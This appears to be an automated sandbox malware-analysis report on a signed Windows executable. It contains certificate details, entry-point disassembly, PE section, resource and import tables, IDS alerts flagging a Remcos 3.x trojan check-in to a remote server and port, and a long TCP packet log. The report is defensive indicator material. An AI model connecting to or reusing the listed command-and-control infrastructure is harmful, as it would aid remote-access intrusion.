                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                    Error Number:-2146762487
                                                    Not Before, Not After
                                                    • 26/12/2023 04:10:57 25/12/2026 04:10:57
                                                    Subject Chain
                                                    • E=Kollaboratrer@Nonlister.Te, O=Eddikebrygger, OU="Cinquefoil Grundtvigsk Mehari ", CN=Eddikebrygger, L=Burgdorf, S=Niedersachsen, C=DE
                                                    Version:3
                                                    Thumbprint MD5:B676D6300E2427C986444EABDA349B7E
                                                    Thumbprint SHA-1:7FC200E1A289A092DB86D7F7E1EBC2A330E77CED
                                                    Thumbprint SHA-256:FFA7192124534CFE1315677AAFDA1D5418CF1D620A08FEAE269FF0A3A272D490
                                                    Serial:7C986F579975B52027D7E0DB02FDC8C74C17B765
                                                    Instruction
                                                    sub esp, 000003F8h
                                                    push ebp
                                                    push esi
                                                    push edi
                                                    push 00000020h
                                                    pop edi
                                                    xor ebp, ebp
                                                    push 00008001h
                                                    mov dword ptr [esp+20h], ebp
                                                    mov dword ptr [esp+18h], 0040A230h
                                                    mov dword ptr [esp+14h], ebp
                                                    call dword ptr [004080A0h]
                                                    mov esi, dword ptr [004080A4h]
                                                    lea eax, dword ptr [esp+34h]
                                                    push eax
                                                    mov dword ptr [esp+4Ch], ebp
                                                    mov dword ptr [esp+0000014Ch], ebp
                                                    mov dword ptr [esp+00000150h], ebp
                                                    mov dword ptr [esp+38h], 0000011Ch
                                                    call esi
                                                    test eax, eax
                                                    jne 00007F6F30CB984Ah
                                                    lea eax, dword ptr [esp+34h]
                                                    mov dword ptr [esp+34h], 00000114h
                                                    push eax
                                                    call esi
                                                    mov ax, word ptr [esp+48h]
                                                    mov ecx, dword ptr [esp+62h]
                                                    sub ax, 00000053h
                                                    add ecx, FFFFFFD0h
                                                    neg ax
                                                    sbb eax, eax
                                                    mov byte ptr [esp+0000014Eh], 00000004h
                                                    not eax
                                                    and eax, ecx
                                                    mov word ptr [esp+00000148h], ax
                                                    cmp dword ptr [esp+38h], 0Ah
                                                    jnc 00007F6F30CB9818h
                                                    and word ptr [esp+42h], 0000h
                                                    mov eax, dword ptr [esp+40h]
                                                    movzx ecx, byte ptr [esp+3Ch]
                                                    mov dword ptr [00429B18h], eax
                                                    xor eax, eax
                                                    mov ah, byte ptr [esp+38h]
                                                    movzx eax, ax
                                                    or eax, ecx
                                                    xor ecx, ecx
                                                    mov ch, byte ptr [esp+00000148h]
                                                    movzx ecx, cx
                                                    shl eax, 10h
                                                    or eax, ecx
                                                    movzx ecx, byte ptr [esp+0000004Eh]
                                                    Programming Language:
                                                    • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4e000 | 0x21fc0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x79020 | 0x18a0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2a8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x66b7 | 0x6800 | e65344ac983813901119e185754ec24e | False | 0.6607196514423077 | data | 6.4378696011937135 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1358 | 0x1400 | bd82d08a08da8783923a22b467699302 | False | 0.4431640625 | data | 5.103358601944578 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x1fb78 | 0x600 | caa377d001cfc3215a3edff6d7702132 | False | 0.5091145833333334 | data | 4.126209888385862 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2a000 | 0x24000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4e000 | 0x21fc0 | 0x22000 | b6895077917494c69888f8ec28defac3 | False | 0.5621625114889706 | data | 5.704065075881836 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4e448 | 0xc828 | Device independent bitmap graphic, 128 x 256 x 24, image size 51200 | English | United States | 0.1488095238095238
RT_ICON | 0x5ac70 | 0x874c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9902413673634369
RT_ICON | 0x633c0 | 0x3fd8 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9864170337738619
RT_ICON | 0x67398 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.35
RT_ICON | 0x69940 | 0x202c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.986401165614376
RT_ICON | 0x6b970 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.41580675422138835
RT_ICON | 0x6ca18 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2688 | English | United States | 0.4600213219616205
RT_ICON | 0x6d8c0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.5879963898916968
RT_ICON | 0x6e168 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1536 | English | United States | 0.3871951219512195
RT_ICON | 0x6e7d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.4190751445086705
RT_ICON | 0x6ed38 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6019503546099291
RT_ICON | 0x6f1a0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.5403225806451613
RT_ICON | 0x6f488 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.6756756756756757
RT_DIALOG | 0x6f5b0 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x6f6b0 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x6f7d0 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x6f898 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x6f8f8 | 0xbc | data | English | United States | 0.6382978723404256
RT_VERSION | 0x6f9b8 | 0x2c4 | data | English | United States | 0.4901129943502825
RT_MANIFEST | 0x6fc80 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll | RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/03/24-09:43:53.816926 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 29871 | 49739 | 193.222.96.21 | 192.168.2.4
05/03/24-09:43:53.300767 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 49739 | 29871 | 192.168.2.4 | 193.222.96.21
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 3, 2024 09:43:49.214324951 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.214353085 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.214432001 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.242537022 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.242558956 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.434140921 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.434351921 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.521544933 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.521564960 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.521917105 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.522013903 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.526468039 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.572118044 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.659770966 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.659836054 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.659917116 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.660075903 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.660085917 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.660180092 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.660186052 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.660270929 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.660367012 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.660435915 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.660442114 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.660506010 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.660512924 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.660564899 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.660578012 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.660584927 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.660629034 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.660715103 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.660768986 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.660844088 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.660849094 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.660923004 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.660927057 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.660990000 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.660994053 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.661048889 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.661077023 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.661083937 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.661134005 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.661226034 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.661417961 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.661500931 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.661506891 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.661578894 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.661602974 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.661608934 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.661683083 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.661706924 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.661712885 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.661807060 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.662324905 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.662414074 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.662436008 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.662444115 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.662528992 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.662533998 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.662619114 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.662627935 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.662707090 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.662843943 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.662914038 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.663012981 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.663105011 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.663157940 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.663239956 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.663244963 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.663312912 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.663316965 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.663383007 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.663387060 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.663451910 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.663551092 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.663628101 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.663631916 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.663700104 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.664058924 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.664134979 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.664140940 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.664206028 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.664210081 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.664271116 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.664297104 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.664364100 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.664369106 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.664429903 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.664434910 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.664499998 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.664505005 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.664568901 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.665142059 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.665237904 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.747775078 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.747920036 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.747975111 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.748051882 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.748292923 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.748398066 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.748648882 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.748738050 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
May 3, 2024 09:43:49.748966932 CEST | 443 | 49738 | 172.67.215.46 | 192.168.2.4
May 3, 2024 09:43:49.749058962 CEST | 49738 | 443 | 192.168.2.4 | 172.67.215.46
                                                    May 3, 2024 09:43:49.749275923 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.749381065 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.749721050 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.749818087 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.750102043 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.750221968 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.750438929 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.750534058 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.750885963 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.750984907 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.751446962 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.751542091 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.751616955 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.751708984 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.751796007 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.751861095 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.752567053 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.752631903 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.752791882 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.752854109 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.753225088 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.753287077 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.753463030 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.753519058 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.795906067 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.795974016 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.837630987 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.837740898 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.838411093 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.838469028 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.840661049 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.840713024 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.840919018 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.840979099 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.841089010 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.841147900 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.841319084 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.841406107 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.841552019 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.841598034 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.841758013 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.841813087 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.841922045 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.841968060 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.842228889 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.842279911 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.842412949 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.842463017 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.842560053 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.842617035 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.842941046 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.842994928 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.843179941 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.843240023 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.843408108 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.843461037 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.843616962 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.843671083 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.843795061 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.843852997 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.844094038 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.844141006 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.844335079 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.844383955 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.844471931 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.844517946 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.845150948 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.845194101 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.845779896 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.845788002 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.845822096 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.845833063 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.845839024 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.845858097 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.845879078 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.846602917 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.846618891 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.846654892 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.846658945 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.846690893 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.846714020 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.848062992 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.848078012 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.848115921 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.848120928 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.848151922 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.848174095 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.849353075 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.849368095 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.849426985 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.849432945 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.849466085 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.849473000 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.851032972 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.851047993 CEST44349738172.67.215.46192.168.2.4
